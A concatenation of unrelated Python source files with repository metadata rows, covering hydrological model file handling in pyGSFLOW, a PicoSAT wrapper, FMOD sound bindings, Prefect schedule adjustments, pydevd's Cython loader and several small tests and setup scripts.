            self.mf._set_name(os.path.join(workspace, basename))
            self._update_mf_basename(basename)
            mfnm = basename + ".nam"
            self.control.set_values(
                "modflow_name",
                [
                    os.path.relpath(
                        os.path.join(workspace, mfnm), self.control.model_dir
                    )
                ],
            )
        # update file names in control object
        self._update_control_fnames(workspace, basename)
        self.prms.control = self.control
        self._write_all(write_only)
    else:
        raise NotImplementedError()
def _update_control_fnames(self, workspace, basename):
    """
    Method to update control file names and paths
    Parameters
    ----------
    workspace : str
        model output directory
    basename : str
        project basename
    """
    # Workspace-only rename: keep each file's basename, re-anchor it in
    # the new workspace, and store it relative to the control file's dir.
    if workspace is not None and basename is None:
        self.control.model_dir = workspace
        for rec_name in GsConstant.GSFLOW_FILES:
            if rec_name in self.control.record_names:
                file_values = self.control.get_values(rec_name)
                file_value = []
                for fil in file_values:
                    va = os.path.join(workspace, os.path.basename(fil))
                    va = os.path.relpath(va, self.control.model_dir)
                    file_value.append(va)
                self.control.set_values(rec_name, file_value)
    else:
        for rec_name in GsConstant.GSFLOW_FILES:
            if rec_name in self.control.record_names:
                # modflow_name is handled elsewhere (see write_input).
                if rec_name in ("modflow_name",):
                    continue
                # NOTE(review): "modflow_name" in the tuple below is dead
                # code -- the branch above already `continue`s on it.
                elif rec_name in (
                    "modflow_name",
                    "param_file",
                    "data_file",
                ):
                    file_values = self.control.get_values(rec_name)
                    file_value = []
                    for fil in file_values:
                        ws, filvalue = os.path.split(fil)
                        if not ws:
                            # bare filename: keep as-is
                            pass
                        else:
                            filvalue = os.path.relpath(
                                fil, self.control.model_dir
                            )
                        file_value.append(filvalue)
                    self.control.set_values(rec_name, file_value)
                else:
                    file_values = self.control.get_values(rec_name)
                    file_value = []
                    for fil in file_values:
                        # Default to the control dir if no workspace was
                        # given (note: rebinds the parameter for the rest
                        # of the loop).
                        if workspace is None:
                            workspace = self.control.model_dir
                        # Rebuild the name as <basename>_<record-stem>.<ext>,
                        # where the record stem drops the trailing token
                        # (e.g. "stat_var_file" -> "stat_var").
                        vvfile = rec_name.split("_")
                        del vvfile[-1]
                        vvfile = "_".join(vvfile)
                        if "." in fil:
                            ext = fil.split(".")[-1]
                        else:
                            ext = "dat"
                        vvfile = basename + "_" + vvfile + "." + ext
                        filvalue = os.path.join(workspace, vvfile)
                        filvalue = os.path.relpath(
                            filvalue, self.control.model_dir
                        )
                        file_value.append(filvalue)
                    self.control.set_values(rec_name, file_value)
def _update_mf_basename(self, basename):
    """
    Convenience method to rename MODFLOW output files to a new basename.

    Each entry of ``self.mf.output_fnames`` keeps everything after its
    first dot as the "extension" (so multi-dot names like ``model.hds.out``
    keep ``hds.out``) and is re-prefixed with *basename*.

    Parameters
    ----------
    basename : str
        basename of the Modflow object
    """
    renamed = []
    for fname in self.mf.output_fnames:
        if "." in fname:
            # Keep everything after the FIRST dot so compound
            # extensions survive intact.
            ext = fname.split(".", 1)[1]
        else:
            # No dot at all: fall back to the whole name, matching the
            # original behaviour of split(".")[-1].
            ext = fname
        renamed.append("{}.{}".format(basename, ext))
    self.mf.output_fnames = renamed
def _write_all(self, write_only):
    """
    Method to write input files.

    Parameters
    ----------
    write_only : list or None
        subset of files to write; accepts
        'control', 'parameters', 'prms_data', 'mf', and 'modsim'
        (case insensitive). None writes everything.

    Raises
    ------
    ValueError
        if write_only is not a list or contains an unknown option.
    """
    write_only_options = (
        "control",
        "parameters",
        "prms_data",
        "mf",
        "modsim",
    )
    if write_only is not None:
        if not isinstance(write_only, list):
            # Fix: error message typo ("agrgument" -> "argument").
            raise ValueError("write_only argument must be a list")
        # make write options case insensitive
        write_only = [i.lower() for i in write_only]
        for write_option in write_only:
            if write_option not in write_only_options:
                raise ValueError(
                    "The option '{}' is not recognized...".format(
                        write_option
                    )
                )
    else:
        # Empty tuple means "no filter": every section below writes.
        write_only = ()
    # write control
    if len(write_only) == 0 or "control" in write_only:
        print("Writing Control file ...")
        self.control.write()
    if self.prms is not None:
        # write parameters
        if len(write_only) == 0 or "parameters" in write_only:
            print("Writing Parameters files ...")
            self.prms.parameters.write()
        # write data
        if len(write_only) == 0 or "prms_data" in write_only:
            print("Writing Data file ...")
            self.prms.data.write()
    # write mf
    if self.mf is not None:
        if len(write_only) == 0 or "mf" in write_only:
            print("Writing Modflow files...")
            self.mf.write_input()
    if self.modsim is not None:
        if len(write_only) == 0 or "modsim" in write_only:
            print("Writing MODSIM shapefile")
            self.modsim.write_modsim_shapefile()
def run_model(self, model_ws=".", forgive=False, gsflow_exe=None):
    """
    Method to run a gsflow model
    Parameters
    ----------
    model_ws : str
        parameter to specify the model directory
    forgive : bool
        forgives convergence issues
    gsflow_exe : str or None
        path to gsflow_exe, if gsflow_exe is None it will use
        the previously defined gsflow_exe variable or the default
        gsflow.exe.
    Returns
    -------
    None or (success, buffer)
    Examples
    --------
    >>> gsf = gsflow.GsflowModel.load_from_file("gsflow.control")
    >>> gsf.run_model()
    """
    fn = self.control_file
    if gsflow_exe is None:
        gsflow_exe = self.gsflow_exe
    # Bail out early (returning None) rather than failing inside __run.
    if not os.path.isfile(gsflow_exe):
        print(
            "Warning : The executable of the model could not be found. "
            "Use the gsflow_exe= parameter to define its path... "
        )
        return None
    # Messages that mark a successful run in gsflow's stdout.
    normal_msg = [
        "normal termination",
    ]  # , "simulation successful"]
    if forgive:
        # Treat solver non-convergence as a "normal" outcome too.
        normal_msg.append("failed to meet solver convergence criteria")
    return self.__run(
        exe_name=gsflow_exe,
        namefile=fn,
        normal_msg=normal_msg,
        model_ws=model_ws,
    )
    def __run(
        self,
        exe_name,
        namefile,
        model_ws=".",
        silent=False,
        report=False,
        normal_msg="normal termination",
        cargs=None,
    ):
        """
        This function will run the model using subprocess.Popen.

        Parameters
        ----------
        exe_name : str
            Executable name (with path, if necessary) to run.
        namefile : str
            Namefile of model to run. The namefile must be the
            filename of the namefile without the path.
        model_ws : str
            Path to the location of the namefile. (default is the
            current working directory - './')
            NOTE(review): this argument is superseded below; the process
            always runs in the control file's directory.
        silent : boolean
            Suppress echoing of run information to the screen
            (default is False, i.e. output is echoed).
        report : boolean, optional
            Save stdout lines to a list (buff) which is returned
            by the method . (default is False).
        normal_msg : str
            Normal termination message used to determine if the
            run terminated normally. (default is 'normal termination')
        cargs : str or list of strings
            additional command line arguments to pass to the executable.
            Default is None

        Returns
        -------
        (success, buff)
        success : boolean
        buff : list of lines of stdout
        """
        success = False
        buff = []
        # convert normal_msg to lower case for case-insensitive comparison
        if isinstance(normal_msg, str):
            normal_msg = [normal_msg.lower()]
        elif isinstance(normal_msg, list):
            for idx, s in enumerate(normal_msg):
                normal_msg[idx] = s.lower()
        # Check to make sure that program and namefile exist
        exe = which(exe_name)
        if exe is None:
            # NOTE(review): substring containment test; of the usual
            # platform.system() values only "Windows" matches, but an
            # equality test would state the intent more clearly.
            if platform.system() in "Windows":
                if not exe_name.lower().endswith(".exe"):
                    # retry lookup with the conventional Windows suffix
                    exe = which(exe_name + ".exe")
            if exe is None:
                s = "The program {} does not exist or is not executable.".format(
                    exe_name
                )
                raise Exception(s)
        else:
            if not silent:
                s = "pyGSFLOW is using the following executable to run the model: {}".format(
                    exe
                )
                print(s)
        # os.path.join leaves an already-absolute executable path unchanged
        exe = os.path.normpath(os.path.join(os.getcwd(), exe))
        if not os.path.isfile(os.path.join(model_ws, namefile)):
            s = "The namefile for this model does not exists: {}".format(
                namefile
            )
            raise Exception(s)
        # simple little function for the thread to target
        # def q_output(output, q):
        #     for line in iter(output.readline, b''):
        #         q.put(line)
        #         time.sleep(1)
        #         output.close()
        # create a list of arguments to pass to Popen
        argv = [exe, namefile]
        # add additional arguments to Popen arguments
        if cargs is not None:
            if isinstance(cargs, str):
                cargs = [cargs]
            for t in cargs:
                argv.append(t)
        # run the model with Popen
        # if platform.system().lower() == "windows":
        #     self._generate_batch_file()
        #     cargv = self.__bat_file
        # else:
        #     pass
        # NOTE(review): the model_ws argument is discarded here; the run
        # directory is always the directory containing the control file.
        model_ws = os.path.dirname(self.control_file)
        proc = sp.Popen(argv, stdout=sp.PIPE, stderr=sp.STDOUT, cwd=model_ws)
        # Stream stdout line by line, scanning each line for any of the
        # normal-termination messages.
        while True:
            line = proc.stdout.readline()
            c = line.decode("utf-8")
            if c != "":
                for msg in normal_msg:
                    if msg in c.lower():
                        success = True
                        break
                c = c.rstrip("\r\n")
                if not silent:
                    print("{}".format(c))
                if report:
                    buff.append(c)
            else:
                # empty read means stdout was closed (process finished)
                break
        return success, buff
| 33.816106 | 95 | 0.530087 |
466e94eb6dad2cfea42284bb23559a0aba280ee0 | 6,818 | py | Python | tests/integration/storage_memory/test_storage_memory_write.py | Sam-Martin/cloud-wanderer | 1879f9bb150054be5bf33fd46a47414b4939529e | [
"MIT"
] | 1 | 2020-12-07T10:37:41.000Z | 2020-12-07T10:37:41.000Z | tests/integration/storage_memory/test_storage_memory_write.py | Sam-Martin/cloud-wanderer | 1879f9bb150054be5bf33fd46a47414b4939529e | [
"MIT"
] | null | null | null | tests/integration/storage_memory/test_storage_memory_write.py | Sam-Martin/cloud-wanderer | 1879f9bb150054be5bf33fd46a47414b4939529e | [
"MIT"
] | null | null | null | import logging
import pytest
from moto import mock_ec2, mock_iam, mock_sts
from cloudwanderer.cloud_wanderer_resource import CloudWandererResource
from cloudwanderer.storage_connectors import MemoryStorageConnector
from cloudwanderer.urn import URN
from tests.pytest_helpers import create_ec2_instances
logger = logging.getLogger(__name__)
def test_delete_subresources_from_resource(memory_connector, iam_role, iam_role_policies):
    """If we are deleting a parent resource we should delete all its subresources."""
    resources = [iam_role, iam_role_policies[0], iam_role_policies[1]]
    for resource in resources:
        memory_connector.write_resource(resource=resource)
    before_delete = [memory_connector.read_resource(urn=resource.urn) for resource in resources]
    # Delete the parent and ensure the subresources are also deleted
    memory_connector.delete_resource(urn=iam_role.urn)
    after_delete = [memory_connector.read_resource(urn=resource.urn) for resource in resources]
    # Everything was readable before the delete...
    for read_result, resource in zip(before_delete, resources):
        assert read_result.urn == resource.urn
    # ...and nothing (parent or subresource) is readable afterwards.
    for read_result in after_delete:
        assert read_result is None
| 34.434343 | 109 | 0.661044 |
466f047e17e0d6d7208910c763a4df77317279f9 | 4,596 | py | Python | tt/satisfiability/picosat.py | fkromer/tt | b4dfc90f7d0f9b5794e1f5054b640e22f6f75bf7 | [
"MIT"
] | 233 | 2016-02-05T20:13:06.000Z | 2022-03-26T13:01:10.000Z | tt/satisfiability/picosat.py | fkromer/tt | b4dfc90f7d0f9b5794e1f5054b640e22f6f75bf7 | [
"MIT"
] | 8 | 2017-12-20T17:07:58.000Z | 2020-08-06T15:44:55.000Z | tt/satisfiability/picosat.py | fkromer/tt | b4dfc90f7d0f9b5794e1f5054b640e22f6f75bf7 | [
"MIT"
] | 15 | 2016-03-22T23:37:56.000Z | 2022-02-27T17:51:08.000Z | """Python wrapper around the _clibs PicoSAT extension."""
import os
from tt.errors.arguments import (
InvalidArgumentTypeError,
InvalidArgumentValueError)
if os.environ.get('READTHEDOCS') != 'True':
from tt._clibs import picosat as _c_picosat
VERSION = _c_picosat.VERSION
def sat_one(clauses, assumptions=None):
    """Find a solution that satisfies the specified clauses and assumptions.

    This provides a light Python wrapper around the same method in the PicoSAT
    C-extension. While completely tested and usable, this method is probably
    not as useful as the interface provided through the
    :func:`sat_one <tt.expressions.bexpr.BooleanExpression.sat_one>` method in
    the :class:`BooleanExpression <tt.expressions.bexpr.BooleanExpression>`
    class.

    :param clauses: CNF (AND of ORs) clauses; positive integers represent
        non-negated terms and negative integers represent negated terms.
    :type clauses: List[List[:class:`int <python:int>`]]

    :param assumptions: Assumed terms; same negation logic from ``clauses``
        applies here. Note that assumptions *cannot* be an empty list; leave it
        as ``None`` if there are no assumptions to include.
    :type assumptions: List[:class:`int <python:int>`]

    :returns: If solution is found, a list of ints representing the terms of
        the solution; otherwise, if no solution found, ``None``.
    :rtype: List[:class:`int <python:int>`] or ``None``

    :raises InvalidArgumentTypeError: If ``clauses`` is not a list of lists of
        ints or ``assumptions`` is not a list of ints.
    :raises InvalidArgumentValueError: If any literal ints are equal to zero.

    Let's look at a simple example with no satisfiable solution::

        >>> from tt import picosat
        >>> picosat.sat_one([[1], [-1]]) is None
        True

    Here's an example where a solution exists::

        >>> picosat.sat_one([[1, 2, 3], [-2, -3], [1, -2], [2, -3], [-2]])
        [1, -2, -3]

    Finally, here's an example using assumptions::

        >>> picosat.sat_one([[1, 2, 3], [2, 3]], assumptions=[-1, -3])
        [-1, 2, -3]

    """
    try:
        return _c_picosat.sat_one(clauses, assumptions=assumptions)
    except TypeError as e:
        # Chain the original C-extension exception as __cause__ so the
        # underlying failure remains visible in tracebacks (PEP 3134).
        raise InvalidArgumentTypeError(str(e)) from e
    except ValueError as e:
        raise InvalidArgumentValueError(str(e)) from e
def sat_all(clauses, assumptions=None):
    """Find all solutions that satisfy the specified clauses and assumptions.

    This provides a light Python wrapper around the same method in the PicoSAT
    C-extension. While completely tested and usable, this method is probably
    not as useful as the interface provided through the
    :func:`sat_all <tt.expressions.bexpr.BooleanExpression.sat_all>` method in
    the :class:`BooleanExpression <tt.expressions.bexpr.BooleanExpression>`
    class.

    :param clauses: CNF (AND of ORs) clauses; positive integers represent
        non-negated terms and negative integers represent negated terms.
    :type clauses: List[List[:class:`int <python:int>`]]

    :param assumptions: Assumed terms; same negation logic from ``clauses``
        applies here. Note that assumptions *cannot* be an empty list; leave it
        as ``None`` if there are no assumptions to include.
    :type assumptions: List[:class:`int <python:int>`]

    :returns: An iterator of solutions; if no satisfiable solutions exist, the
        iterator will be empty.
    :rtype: Iterator[List[:class:`int <python:int>`]]

    :raises InvalidArgumentTypeError: If ``clauses`` is not a list of lists of
        ints or ``assumptions`` is not a list of ints.
    :raises InvalidArgumentValueError: If any literal ints are equal to zero.

    Here's an example showing the basic usage::

        >>> from tt import picosat
        >>> for solution in picosat.sat_all([[1], [2, 3, 4], [2, 3]]):
        ...     print(solution)
        ...
        [1, 2, 3, 4]
        [1, 2, 3, -4]
        [1, 2, -3, 4]
        [1, 2, -3, -4]
        [1, -2, 3, 4]
        [1, -2, 3, -4]

    We can cut down on some of the above solutions by including an assumption::

        >>> for solution in picosat.sat_all([[1], [2, 3, 4], [2, 3]],
        ...                                 assumptions=[-3]):
        ...     print(solution)
        ...
        [1, 2, -3, 4]
        [1, 2, -3, -4]

    """
    try:
        return _c_picosat.sat_all(clauses, assumptions=assumptions)
    except TypeError as e:
        # Chain the original C-extension exception as __cause__ so the
        # underlying failure remains visible in tracebacks (PEP 3134).
        raise InvalidArgumentTypeError(str(e)) from e
    except ValueError as e:
        raise InvalidArgumentValueError(str(e)) from e
| 37.672131 | 79 | 0.650131 |
466f1e4523ee66d1060bcbe9b327e33221329528 | 3,745 | py | Python | tests/test_text_visualization.py | dianna-ai/dianna | 88bcaec001e640c35e5e1e08517ef1624fd661cb | [
"Apache-2.0"
] | 9 | 2021-11-16T09:53:47.000Z | 2022-03-02T13:28:53.000Z | tests/test_text_visualization.py | dianna-ai/dianna | 88bcaec001e640c35e5e1e08517ef1624fd661cb | [
"Apache-2.0"
] | 340 | 2021-03-03T12:55:37.000Z | 2022-03-31T13:53:44.000Z | tests/test_text_visualization.py | dianna-ai/dianna | 88bcaec001e640c35e5e1e08517ef1624fd661cb | [
"Apache-2.0"
] | 5 | 2021-08-19T08:14:35.000Z | 2022-03-17T21:12:46.000Z | import os
import re
import shutil
import unittest
from pathlib import Path
from dianna.visualization.text import highlight_text
def _split_text_into_words(text):
# regex taken from
# https://stackoverflow.com/questions/12683201/python-re-split-to-split-by-spaces-commas-and-periods-but-not-in-cases-like
# explanation: split by \s (whitespace), and only split by commas and
# periods if they are not followed (?!\d) or preceded (?<!\d) by a digit.
regex = r'\s|(?<!\d)[,.](?!\d)'
return re.split(regex, text)
| 42.556818 | 131 | 0.646996 |
466fca56f7b6e59caf823a738ec5c36d18b27c25 | 2,983 | py | Python | setup.py | guilhermeleobas/rbc | 4b568b91c6ce3ef7727fee001169302c3803c4fd | [
"BSD-3-Clause"
] | null | null | null | setup.py | guilhermeleobas/rbc | 4b568b91c6ce3ef7727fee001169302c3803c4fd | [
"BSD-3-Clause"
] | null | null | null | setup.py | guilhermeleobas/rbc | 4b568b91c6ce3ef7727fee001169302c3803c4fd | [
"BSD-3-Clause"
] | null | null | null | import os
import sys
import builtins
import versioneer
if sys.version_info[:2] < (3, 7):
raise RuntimeError("Python version >= 3.7 required.")
builtins.__RBC_SETUP__ = True
if os.path.exists('MANIFEST'):
os.remove('MANIFEST')
CONDA_BUILD = int(os.environ.get('CONDA_BUILD', '0'))
CONDA_ENV = os.environ.get('CONDA_PREFIX', '') != ''
from setuptools import setup, find_packages # noqa: E402
DESCRIPTION = "RBC - Remote Backend Compiler Project"
LONG_DESCRIPTION = """
The aim of the Remote Backend Compiler project is to distribute the
tasks of a program JIT compilation process to separate computer
systems using the client-server model. The frontend of the compiler
runs on the client computer and the backend runs on the server
computer. The compiler frontend will send the program code to compiler
backend in IR form where it will be compiled to machine code.
"""
if __name__ == '__main__':
setup_package()
del builtins.__RBC_SETUP__
| 32.78022 | 76 | 0.650352 |
46701c0193cfd9ee406763922c026176cc2a2fc9 | 1,126 | py | Python | src/prefect/schedules/adjustments.py | concreted/prefect | dd732f5990ee2b0f3d816adb285168fd63b239e4 | [
"Apache-2.0"
] | 8,633 | 2019-03-23T17:51:03.000Z | 2022-03-31T22:17:42.000Z | src/prefect/schedules/adjustments.py | concreted/prefect | dd732f5990ee2b0f3d816adb285168fd63b239e4 | [
"Apache-2.0"
] | 3,903 | 2019-03-23T19:11:21.000Z | 2022-03-31T23:21:23.000Z | src/prefect/schedules/adjustments.py | ngriffiths13/prefect | 7f5613abcb182494b7dc12159277c3bc5f3c9898 | [
"Apache-2.0"
] | 937 | 2019-03-23T18:49:44.000Z | 2022-03-31T21:45:13.000Z | """
Schedule adjustments are functions that accept a `datetime` and modify it in some way.
Adjustments have the signature `Callable[[datetime], datetime]`.
"""
from datetime import datetime, timedelta
from typing import Callable
import pendulum
import prefect.schedules.filters
def add(interval: timedelta) -> Callable[[datetime], datetime]:
    """
    Adjustment that adds a specified interval to the date.

    Args:
        - interval (timedelta): the amount of time to add

    Returns:
        - Callable[[datetime], datetime]: the adjustment function
    """

    # Fix: the inner adjustment function was missing, so the name
    # `_adjustment_fn` returned below was undefined at call time.
    def _adjustment_fn(dt: datetime) -> datetime:
        return pendulum.instance(dt) + interval

    return _adjustment_fn
def next_weekday(dt: datetime) -> datetime:
    """
    Adjustment that advances a date to the next weekday. If the date is
    already a weekday, it is returned unadjusted.

    Args:
        - dt (datetime): the datetime to adjust

    Returns:
        - datetime: the adjusted datetime
    """
    candidate = pendulum.instance(dt)
    # Step forward one day at a time until a weekday is reached.
    while not prefect.schedules.filters.is_weekday(candidate):
        candidate = candidate.add(days=1)
    return candidate
| 24.478261 | 90 | 0.683837 |
4671817d5486f1ffa5048135771d27e1109e5cdd | 12,349 | py | Python | src/pyfmodex/sound.py | Loodoor/UnamedPy | 7d154c3a652992b3c1f28050f0353451f57b2a2d | [
"MIT"
] | 1 | 2017-02-21T16:46:21.000Z | 2017-02-21T16:46:21.000Z | src/pyfmodex/sound.py | Loodoor/UnamedPy | 7d154c3a652992b3c1f28050f0353451f57b2a2d | [
"MIT"
] | 1 | 2017-02-21T17:57:05.000Z | 2017-02-22T11:28:51.000Z | src/pyfmodex/sound.py | Loodoor/UnamedPy | 7d154c3a652992b3c1f28050f0353451f57b2a2d | [
"MIT"
] | null | null | null | from .fmodobject import *
from .fmodobject import _dll
from .structures import TAG, VECTOR
from .globalvars import get_class
class Sound(FmodObject):
    """Wrapper for an FMOD sound handle; each method forwards to the
    corresponding FMOD_Sound_* function in the FMOD C library via ctypes."""

    def get_length(self, ltype):
        """Return the sound's length measured in the unit given by `ltype`.

        :param ltype: FMOD time-unit constant, passed straight through to FMOD.
        """
        # NOTE: `len` shadows the builtin; left unchanged here.
        len = c_uint()
        ckresult(_dll.FMOD_Sound_GetLength(self._ptr, byref(len), ltype))
        return len.value

    def get_music_channel_volume(self, channel):
        """Return the volume of music channel `channel` as a float."""
        v = c_float()
        ckresult(_dll.FMOD_Sound_GetMusicChannelVolume(self._ptr, channel, byref(v)))
        return v.value

    def set_music_channel_volume(self, id, vol):
        """Set the volume of music channel `id` to `vol`."""
        # NOTE: `id` shadows the builtin; left unchanged here.
        ckresult(_dll.FMOD_Sound_SetMusicChannelVolume(self._ptr, id, c_float(vol)))

    def get_subsound(self, index):
        """Return the subsound at `index`, wrapped in a new Sound object."""
        sh_ptr = c_void_p()
        ckresult(_dll.FMOD_Sound_GetSubSound(self._ptr, index, byref(sh_ptr)))
        return Sound(sh_ptr)

    def get_sync_point(self, index):
        """Return the sync point handle at `index` as an int."""
        sp = c_int()
        ckresult(_dll.FMOD_Sound_GetSyncPoint(self._ptr, index, byref(sp)))
        return sp.value

    def get_sync_point_info(self, point):
        """Return the name, offset and offset type of sync point `point`.

        The name buffer is limited to 256 bytes by the call below.
        """
        name = c_char_p()
        offset = c_uint()
        offsettype = c_int()
        ckresult(_dll.FMOD_Sound_GetSyncPointInfo(self._ptr, point, byref(name), 256, byref(offset), byref(offsettype)))
        # `so` comes in via the star import from fmodobject; presumably a
        # simple record/namedtuple-like constructor -- verify at import site.
        return so(name=name.value, offset=offset.value, offset_type=offsettype.value)

    def lock(self, offset, length):
        """Lock `length` bytes starting at `offset` for direct access.

        :returns: Two (ptr, len) pairs as filled in by FMOD; pass them back
            to unlock() when finished.
        """
        ptr1 = c_void_p()
        len1 = c_uint()
        ptr2 = c_void_p()
        len2 = c_uint()
        ckresult(_dll.FMOD_Sound_Lock(self._ptr, offset, length, byref(ptr1), byref(ptr2), byref(len1), byref(len2)))
        return ((ptr1, len1), (ptr2, len2))

    def release(self):
        """Free the underlying FMOD sound object."""
        ckresult(_dll.FMOD_Sound_Release(self._ptr))

    def set_subsound(self, index, snd):
        """Assign Sound `snd` as the subsound at position `index`."""
        check_type(snd, Sound)
        ckresult(_dll.FMOD_Sound_SetSubSound(self._ptr, index, snd._ptr))

    def set_subsound_sentence(self, sounds):
        """Set the playback sentence order from a list of Sound objects."""
        # NOTE(review): the ctypes array element type is c_int while the
        # values are raw handles; on 64-bit builds a pointer-sized element
        # type may be required -- confirm against the FMOD API.
        a = c_int * len(sounds)
        ptrs = [o._ptr for o in sounds]
        ai = a(*ptrs)
        ckresult(_dll.FMOD_Sound_SetSubSoundSentence(self._ptr, ai, len(ai)))

    def unlock(self, i1, i2):
        """I1 and I2 are tuples of form (ptr, len)."""
        # Arguments are reordered here to FMOD's (ptr1, ptr2, len1, len2).
        ckresult(_dll.FMOD_Sound_Unlock(self._ptr, i1[0], i2[0], i1[1], i2[1]))

    def read_data(self, length):
        """Read a fragment of the sound's decoded data.
        :param length: The requested length.
        :returns: The data and the actual length.
        :rtype: Tuple of the form (data, actual)."""
        buf = create_string_buffer(length)
        actual = c_uint()
        self._call_fmod("FMOD_Sound_ReadData", buf, length, byref(actual))
        return buf.value, actual.value
def seek_data(self, offset):
"""Seeks for data reading purposes.
:param offset: The offset to seek to in PCM samples.
:type offset: Int or long, but must be in range of an unsigned long, not python's arbitrary long."""
self._call_fmod("FMOD_Sound_SeekData", offset) | 31.745501 | 128 | 0.639809 |
4671cf40aee848a7cf0a11db6406cdad41f3981d | 7,667 | py | Python | src/pynwb/retinotopy.py | weiglszonja/pynwb | 441c64f332b32eb8141a9d03d92e0fda2fd1ad83 | [
"BSD-3-Clause-LBNL"
] | 132 | 2017-08-05T00:35:18.000Z | 2022-03-22T08:14:18.000Z | src/pynwb/retinotopy.py | weiglszonja/pynwb | 441c64f332b32eb8141a9d03d92e0fda2fd1ad83 | [
"BSD-3-Clause-LBNL"
] | 1,273 | 2017-08-04T05:14:47.000Z | 2022-03-28T13:00:27.000Z | src/pynwb/retinotopy.py | weiglszonja/pynwb | 441c64f332b32eb8141a9d03d92e0fda2fd1ad83 | [
"BSD-3-Clause-LBNL"
] | 68 | 2017-08-04T16:45:19.000Z | 2022-03-22T08:14:15.000Z | from collections.abc import Iterable
import warnings
from hdmf.utils import docval, popargs, call_docval_func, get_docval
from . import register_class, CORE_NAMESPACE
from .core import NWBDataInterface, NWBData
| 52.513699 | 119 | 0.626842 |
46725864f7a8f29464ea63af729e3e78c2a1218d | 370 | py | Python | GreenMoon/forms.py | ma010/green-moon | 25ed395f1e19c180995b22508143c8819bf40fae | [
"CNRI-Python"
] | null | null | null | GreenMoon/forms.py | ma010/green-moon | 25ed395f1e19c180995b22508143c8819bf40fae | [
"CNRI-Python"
] | null | null | null | GreenMoon/forms.py | ma010/green-moon | 25ed395f1e19c180995b22508143c8819bf40fae | [
"CNRI-Python"
] | null | null | null | """
Implement a class function for user to put in a zip-code and
search relevant information about business entities in that zip-code area.
"""
from flask.ext.wtf import Form
from wtforms import StringField, BooleanField
from wtforms.validators import DataRequired
| 28.461538 | 78 | 0.77027 |
46750d2f3ef713a053808ca00fc559cb70158512 | 283 | py | Python | Phase-2/Linked List/Day-70.py | CodedLadiesInnovateTech/python-challenges | 22ce26c68fea6c7c243ada831e47c52e27a62127 | [
"MIT"
] | 11 | 2020-05-11T08:41:21.000Z | 2022-02-27T08:21:37.000Z | Phase-2/Linked List/Day-70.py | CodedLadiesInnovateTech/python-challenges | 22ce26c68fea6c7c243ada831e47c52e27a62127 | [
"MIT"
] | 9 | 2020-05-12T10:46:06.000Z | 2020-05-28T17:37:19.000Z | Phase-2/Linked List/Day-70.py | CodedLadiesInnovateTech/python-challenges | 22ce26c68fea6c7c243ada831e47c52e27a62127 | [
"MIT"
] | 44 | 2020-05-10T20:53:32.000Z | 2021-04-25T18:47:08.000Z | '''
1. Write a Python program to access a specific item in a singly linked list using index value.
2. Write a Python program to set a new value of an item in a singly linked list using index value.
3. Write a Python program to delete the first item from a singly linked list.
'''
| 31.444444 | 98 | 0.749117 |
46759a54fd059282243dcf32a6f899667fd72ec3 | 25 | py | Python | ngboost/version.py | dsharpc/ngboost | 8c05e0cb3b95bb23d8f30f17042d2fd8926c4014 | [
"Apache-2.0"
] | null | null | null | ngboost/version.py | dsharpc/ngboost | 8c05e0cb3b95bb23d8f30f17042d2fd8926c4014 | [
"Apache-2.0"
] | null | null | null | ngboost/version.py | dsharpc/ngboost | 8c05e0cb3b95bb23d8f30f17042d2fd8926c4014 | [
"Apache-2.0"
] | null | null | null | __version__ = "0.3.4dev"
| 12.5 | 24 | 0.68 |
467608de6f71ab4b616b2d09915c4d849b7654e0 | 624 | py | Python | premailer/tests/test_utils.py | p12tic/premailer | ebfd310dbd0a88b465e811411f67a360e11f3292 | [
"BSD-3-Clause"
] | null | null | null | premailer/tests/test_utils.py | p12tic/premailer | ebfd310dbd0a88b465e811411f67a360e11f3292 | [
"BSD-3-Clause"
] | 1 | 2018-11-23T11:58:22.000Z | 2018-11-23T13:58:13.000Z | premailer/tests/test_utils.py | lavr/premailer | ebfd310dbd0a88b465e811411f67a360e11f3292 | [
"BSD-3-Clause"
] | null | null | null | import unittest
from premailer.premailer import capitalize_float_margin
| 31.2 | 70 | 0.639423 |
4676a784f66c68a2faf6e33e2c3d3bf09c476661 | 1,652 | py | Python | home/vscode/extensions/ms-python.python-2021.12.1559732655/pythonFiles/lib/python/debugpy/_vendored/pydevd/_pydevd_bundle/pydevd_cython_wrapper.py | qwertzy-antonio-godinho/dots | 65cd657f785e7da3a3ccb1a808c0fc1b8496e5b1 | [
"Apache-2.0"
] | 6 | 2021-12-26T13:34:32.000Z | 2022-02-08T22:09:38.000Z | src/ptvsd/_vendored/pydevd/_pydevd_bundle/pydevd_cython_wrapper.py | ev3dev/ptvsd | cea22767dd78a812a14e2330a540a368f615224e | [
"MIT"
] | 8 | 2020-07-19T23:39:31.000Z | 2022-02-27T01:38:46.000Z | vscode/extensions/ms-python.python-2020.3.69010/pythonFiles/lib/python/old_ptvsd/ptvsd/_vendored/pydevd/_pydevd_bundle/pydevd_cython_wrapper.py | Adespinoza/dotfiles | e2509402a7fd2623a3ea401b6f9fcbf6a372fc60 | [
"CC0-1.0"
] | 3 | 2020-08-04T02:48:32.000Z | 2020-08-17T01:20:09.000Z | import sys
# Locate the Cython-accelerated pydevd module, trying progressively more
# specific module names, then re-export its public entry points below.
try:
    try:
        from _pydevd_bundle_ext import pydevd_cython as mod
    except ImportError:
        from _pydevd_bundle import pydevd_cython as mod
except ImportError:
    import struct
    try:
        # pointer size distinguishes 32-bit from 64-bit interpreters
        is_python_64bit = (struct.calcsize('P') == 8)
    except:
        # In Jython this call fails, but this is Ok, we don't support Jython for speedups anyways.
        raise ImportError
    plat = '32'
    if is_python_64bit:
        plat = '64'
    # We also accept things as:
    #
    # _pydevd_bundle.pydevd_cython_win32_27_32
    # _pydevd_bundle.pydevd_cython_win32_34_64
    #
    # to have multiple pre-compiled pyds distributed along the IDE
    # (generated by build_tools/build_binaries_windows.py).
    mod_name = 'pydevd_cython_%s_%s%s_%s' % (sys.platform, sys.version_info[0], sys.version_info[1], plat)
    check_name = '_pydevd_bundle.%s' % (mod_name,)
    # __import__ returns the top-level package; fetch the leaf module by name.
    mod = getattr(__import__(check_name), mod_name)
# Regardless of how it was found, make sure it's later available as the
# initial name so that the expected types from cython in frame eval
# are valid.
sys.modules['_pydevd_bundle.pydevd_cython'] = mod
# Re-export the accelerated implementations under the names the rest of
# the debugger imports from this wrapper module.
trace_dispatch = mod.trace_dispatch
PyDBAdditionalThreadInfo = mod.PyDBAdditionalThreadInfo
set_additional_thread_info = mod.set_additional_thread_info
global_cache_skips = mod.global_cache_skips
global_cache_frame_skips = mod.global_cache_frame_skips
_set_additional_thread_info_lock = mod._set_additional_thread_info_lock
